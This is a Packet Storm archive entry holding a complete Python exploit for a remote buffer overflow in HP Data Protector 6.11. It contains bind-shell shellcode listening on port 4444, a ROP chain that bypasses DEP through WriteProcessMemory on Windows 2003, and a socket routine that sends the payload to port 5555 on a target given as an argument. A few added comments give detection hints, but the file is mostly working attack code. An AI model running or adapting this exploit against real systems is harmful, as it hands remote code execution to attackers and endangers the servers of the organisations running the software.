HP Data Protector 6.11 Remote Buffer Overflow

2011-07-02T00:00:00
ID PACKETSTORM:102733
Type packetstorm
Reporter muts
Modified 2011-07-02T00:00:00

Description

                                        
                                            `#!/usr/bin/python  
# HP Data Protector 6.11 Remote Buffer Overflow  
# Tested on Windows 2003 R2 + DEP Enabled  
# Authors: muts & dookie  
# Reference: http://www.exploit-db.com/exploits/17458/  
# Reference: http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities  
# http://www.offensive-security.com/0day/hp-dataprotector.py.txt  
  
import struct, socket, sys  
# Reviewer notes (defensive reading of this PoC):  
# - One unauthenticated TCP connection to port 5555 (the omniinet.exe  
#   service named in the gadget comments below) carries a single request  
#   of roughly 1 MB, dominated by the 980000-byte "C" filler added before  
#   the trailer. Nothing is read back.  
# - Every gadget address is hard-coded for the Windows 2003 build named in  
#   the header, so the chain is build-specific.  
# - Detection can key on the anomalous request size to this port rather  
#   than on payload content; see the references in the header for the  
#   vendor / CoreSecurity advisory.  
# Python 2-era script: str literals are used directly as raw bytes.  
# Target host is the only CLI argument; there is no argument-count check,  
# so running without one raises IndexError.  
target = sys.argv[1]  
  
# bindshell - port 4444  
shellcode = ("\xbf\x83\x75\x7f\xdd\xdb\xc8\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"  
"\x56\x31\x7e\x13\x03\x7e\x13\x83\xee\x7f\x97\x8a\x21\x97\xd1"  
"\x75\xda\x67\x82\xfc\x3f\x56\x90\x9b\x34\xca\x24\xef\x19\xe6"  
"\xcf\xbd\x89\x7d\xbd\x69\xbd\x36\x08\x4c\xf0\xc7\xbc\x50\x5e"  
"\x0b\xde\x2c\x9d\x5f\x00\x0c\x6e\x92\x41\x49\x93\x5c\x13\x02"  
"\xdf\xce\x84\x27\x9d\xd2\xa5\xe7\xa9\x6a\xde\x82\x6e\x1e\x54"  
"\x8c\xbe\x8e\xe3\xc6\x26\xa5\xac\xf6\x57\x6a\xaf\xcb\x1e\x07"  
"\x04\xbf\xa0\xc1\x54\x40\x93\x2d\x3a\x7f\x1b\xa0\x42\x47\x9c"  
"\x5a\x31\xb3\xde\xe7\x42\x00\x9c\x33\xc6\x95\x06\xb0\x70\x7e"  
"\xb6\x15\xe6\xf5\xb4\xd2\x6c\x51\xd9\xe5\xa1\xe9\xe5\x6e\x44"  
"\x3e\x6c\x34\x63\x9a\x34\xef\x0a\xbb\x90\x5e\x32\xdb\x7d\x3f"  
"\x96\x97\x6c\x54\xa0\xf5\xf8\x99\x9f\x05\xf9\xb5\xa8\x76\xcb"  
"\x1a\x03\x11\x67\xd3\x8d\xe6\x88\xce\x6a\x78\x77\xf0\x8a\x50"  
"\xbc\xa4\xda\xca\x15\xc4\xb0\x0a\x99\x11\x16\x5b\x35\xc9\xd7"  
"\x0b\xf5\xb9\xbf\x41\xfa\xe6\xa0\x69\xd0\x91\xe6\xa7\x00\xf2"  
"\x80\xc5\xb6\xe5\x0c\x43\x50\x6f\xbd\x05\xca\x07\x7f\x72\xc3"  
"\xb0\x80\x50\x7f\x69\x17\xec\x69\xad\x18\xed\xbf\x9e\xb5\x45"  
"\x28\x54\xd6\x51\x49\x6b\xf3\xf1\x00\x54\x94\x88\x7c\x17\x04"  
"\x8c\x54\xcf\xa5\x1f\x33\x0f\xa3\x03\xec\x58\xe4\xf2\xe5\x0c"  
"\x18\xac\x5f\x32\xe1\x28\xa7\xf6\x3e\x89\x26\xf7\xb3\xb5\x0c"  
"\xe7\x0d\x35\x09\x53\xc2\x60\xc7\x0d\xa4\xda\xa9\xe7\x7e\xb0"  
"\x63\x6f\x06\xfa\xb3\xe9\x07\xd7\x45\x15\xb9\x8e\x13\x2a\x76"  
"\x47\x94\x53\x6a\xf7\x5b\x8e\x2e\x07\x16\x92\x07\x80\xff\x47"  
"\x1a\xcd\xff\xb2\x59\xe8\x83\x36\x22\x0f\x9b\x33\x27\x4b\x1b"  
"\xa8\x55\xc4\xce\xce\xca\xe5\xda")  
  
wpm = "\x55\x23\xe4\x77" # 77E42355 WriteProcessMemory - Win2k3   
wpm += "\x50\xd0\x4b\x00" # 004bd050 omniinet.exe - Return after WPM   
wpm += "\xff\xff\xff\xff" # hProcess   
wpm += "\x50\xd0\x4b\x00" # 004bd050 omniinet.exe - Address to Patch   
wpm += "\x41\x41\x41\x41" # lpBuffer placeholder (Shellcode Address)   
wpm += "\x42\x42\x42\x42" # nSize placeholder (Shellcode Size) 00001000  
wpm += "\x38\xd4\x4b\x00" # 004BD438 omniinet.exe - Pointer for Written Bytes   
  
# pre  
packet = ("\x00\x00\x27\xCA\xFF\xFE\x32\x00\x00\x00\x20\x00\x61\x00\x00\x00"  
"\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00"  
"\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x32\x00\x30\x00\x00\x00"  
"\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00"  
"\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00"  
"\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00")  
  
# padding to EIP  
packet +="A"* 2004  
# Get a copy of ESP into a register for safekeeping  
packet +="\x1f\x59\x37\x7c" # 0x7c37591f PUSH ESP # ADD EAX,DWORD PTR DS:[EAX] # ADD CH,BL # INC EBP # OR AL,59 # POP ECX # POP EBP # RETN  
packet += "\x44" * 4 # junk to pop into EBP  
  
# Jump over the WPM parameters  
packet += "\xfe\x9b\x35\x7c" # 0x7c359bfe : # ADD ESP,20 # RETN  
packet += wpm  
packet += "\x44" * 4 # filler  
  
# Get EAX to point at our shellcode on the stack and overwrite the placeholder  
packet += "\x40\xa0\x35\x7c" # 0x7c35a040 : # MOV EAX,ECX # RETN   
packet += "\x1c\x3b\x37\x7c" # 0x7c373b1c : # ADD EAX,100 # POP EBP # RETN  
packet += "\x44" * 4 # filler  
packet += "\xd4\x3d\x43\x00" # 0x00433dd4 : # MOV DWORD PTR DS:[ECX+18],EAX # POP EBP # RETN ** [omniinet.exe]  
packet += "\x44" * 4 # filler  
  
# Craft the shellcode size in EAX and overwrite the placeholder  
packet += "\x2e\x40\x34\x7c" # 0x7c34402e : # POP EDX # RETN ** [MSVCR71.dll]  
packet += "\x59\x3d\x41\x41" # Value to SUB from EAX  
packet += "\x23\x62\x37\x7c" # 0x7c376223 : # POP EAX # RETN ** [MSVCR71.dll]  
packet += "\x41\x41\x41\x41" # To be the sub-ee 41413D59  
packet += "\xe9\xfa\x36\x7c" # 0x7c36fae9 : # SUB EAX,EDX # POP ESI # RETN ** [MSVCR71.dll]  
packet += "\x44" * 4 # filler  
packet += "\x69\x60\x37\x7c" # 0x7c376069 : # MOV DWORD PTR DS:[ECX+1C],EAX # POP EDI # POP ESI # POP EBX # RETN ** [MSVCR71.dll]  
packet += "\x44" * 12 # filler  
  
# Point ESP to WPM and the stack and return  
packet += "\x40\xa0\x35\x7c" # 0x7c35a040 : # MOV EAX,ECX # RETN ** [MSVCR71.dll]  
packet += "\x66\x61\x43\x00" # 0x00436166 : # ADD EAX,2 # POP EBP # RETN ** [omniinet.exe]  
packet += "\x44" * 4 # filler  
packet += "\x66\x61\x43\x00" # 0x00436166 : # ADD EAX,2 # POP EBP # RETN ** [omniinet.exe]  
packet += "\x44" * 4 # filler  
packet += "\x66\x61\x43\x00" # 0x00436166 : # ADD EAX,2 # POP EBP # RETN ** [omniinet.exe]  
packet += "\x44" * 4 # filler  
packet += "\x66\x61\x43\x00" # 0x00436166 : # ADD EAX,2 # POP EBP # RETN ** [omniinet.exe]  
packet += "\x44" * 4 # filler  
packet += "\x05\x8b\x34\x7c" # 0x7c348b05 : # XCHG EAX,ESP # RETN ** [MSVCR71.dll]  
packet += "\x45" * 8  
packet +="\x90" *120  
packet += shellcode  
# 980000 bytes of filler: this is what makes the request size anomalous on the wire.  
packet +="C"* 980000  
# post  
packet +=("\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00"  
"\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00"  
"\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00"  
"\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00"  
"\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00"  
"\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00")  
  
# Blind, single-shot send: no response is read, so the script cannot tell  
# success from failure, and the socket is closed immediately afterwards.  
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)  
sock.connect((target, 5555))  
sock.send(packet)  
sock.close()  
  
`